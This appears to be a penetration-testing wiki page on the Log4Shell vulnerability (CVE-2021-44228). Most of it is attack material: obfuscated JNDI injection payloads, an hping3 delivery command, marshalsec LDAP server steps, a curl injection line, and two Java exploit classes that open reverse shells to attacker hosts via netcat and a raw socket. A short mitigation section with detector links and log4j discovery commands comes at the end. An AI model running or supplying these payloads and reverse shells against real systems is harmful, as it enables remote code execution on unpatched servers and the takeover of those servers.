Log4Shell

Log4j is a logging framework written in Java, distributed under the Apache License since 1996 that offers mechanisms to directly log information such as databases, files, consoles, syslogs etc.. It has three components (loggers, appenders and layouts), which are responsible for capturing log information, publishing that information and formatting it in different styles.
It's utilized in many software programs used today and with over 3 billion devices worldwide; which means the attack surface on a 0day from this framework is huge. It looks for patterns of information like , ${ENV:HOSTNAME}, and parses that information to enrich data.
${jndi:ldap://ATTACKER\a}
CVE-2021-44228 is dangerous. The Java Naming and Directory Interface (JNDI) could be used to access resources it shouldn't and that means syntax could be executed the way it is in log files. Furthermore, this syntax could be used wherever data is logged by an application, which makes the scope of the damage currently unknown but critical.
Original talk: https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf

Payloads: 
${jndi:ldap://127.0.0.1:1389/a}
${j${upper:n:-\n}di:ldap://example.com:1389/a}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
1
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a}
Copied!
1
echo -e '${jndi:ldap://x.x.x.x:389/${java:version}}' > exploit.txt
2
screen -dmS log4j echo -e '0\x0c\x02\x01\x01a\x07\x0a\x01\x00\x04\x00\x04\00' | nc -vv -l -p 1389 | xxd
3
hping3 -2 -s 514 -p 514 -c 3 -a 23.75.195.2 $host -E exploit.txt -d `ls -al exploit.txt | awk '{print $5}'
Copied!
Canary Tokens: https://canarytokens.org/generate#
Huntress: https://log4shell.huntress.com/
Log4shell: https://www.lunasec.io/docs/blog/log4j-zero-day/

Exploit through marshalsec: https://github.com/mbechler/marshalsec
Fullhunt Scanner: https://github.com/fullhunt/log4j-scan
JNDI Exploit Kit: https://github.com/pawnmuncher/JNDI-Exploit-Kit​
1
public class Exploit {
2
    static {
3
        try {
4
            java.lang.Runtime.getRuntime().exec("nc -e /bin/bash YOURRIP 9999");
5
        } catch (Exception e) {
6
            e.printStackTrace();
7
        }
8
    }
9
}
Copied!
1.Exploit.java: java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar
2.marshalsec.jndi.LDAPRefServer "http://ATTACKERIP:8000/#Exploit" 
3.javac Exploit.java -source 8 -target 8 
4.python3 -m http.server | nc -lvnp 9999
5.Finally, curl 'http://MACHINE_IP:8983/PATH\{jndi:ldap://ATTACKERIP:1389/Exploit\}'
Another exploitation example provided by Tract0r:
1
import java.io.IOException;
2
import java.io.InputStream;
3
import java.io.OutputStream;
4
import java.net.Socket;
5
public class Exploit {
6
  public Exploit() throws Exception {
7
    String host="172.20.0.9";
8
    int port=9001;
9
    String cmd="/bin/sh";
10
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
11
    Socket s=new Socket(host,port);
12
    InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
13
    OutputStream po=p.getOutputStream(),so=s.getOutputStream();
14
    while(!s.isClosed()) {
15
      while(pi.available()>0)
16
        so.write(pi.read());
17
      while(pe.available()>0)
18
        so.write(pe.read());
19
      while(si.available()>0)
20
        po.write(si.read());
21
      so.flush();
22
      po.flush();
23
      Thread.sleep(50);
24
      try {
25
        p.exitValue();
26
        break;
27
      }
28
      catch (Exception e){
29
      }
30
    };
31
    p.destroy();
32
    s.close();
33
  }
34
}
Copied!
1
import java.io.IOException;
2
public class Log4jRCE {
3
  public Log4jRCE() throws Exception {
4
        ProcessBuilder processBuilder = new ProcessBuilder();
5
        processBuilder.command("sh", "-c", "nc 172.20.0.9 9001 -e /bin/sh");
6
            try {
7
                Process process = processBuilder.start();
8
            } catch (Exception e) {
9
              e.printStackTrace();
10
            }
11
    }
12
}
Copied!
List of vendors affected initially: https://github.com/NCSC-NL/log4shell/tree/main/software​
Mitigation/Blue Team: 
Guide from Lunasec: www.lunasec.io/docs/blog/log4j-zero-day-mitigation-guide
Log4Shell Detector: https://github.com/Neo23x0/log4shell-detector
Find evidence of log4j usage on Linux: cyb3rops​
1
ps aux | egrep '[l]og4j' find / -iname "log4j*" lsof | grep log4j
2
Find places to which your applications write logs
3
lsof | grep '.log'
4
​
5
jps | grep -v " Jpsquot; |  cut -f1 -d " " | xargs -I '{}' jcmd '{}' VM.class_hierarchy | grep logging.log4j 
Copied!
privesc
Next - Vulnerabilities
Spring4Shell
Last modified 2mo ago
Copy link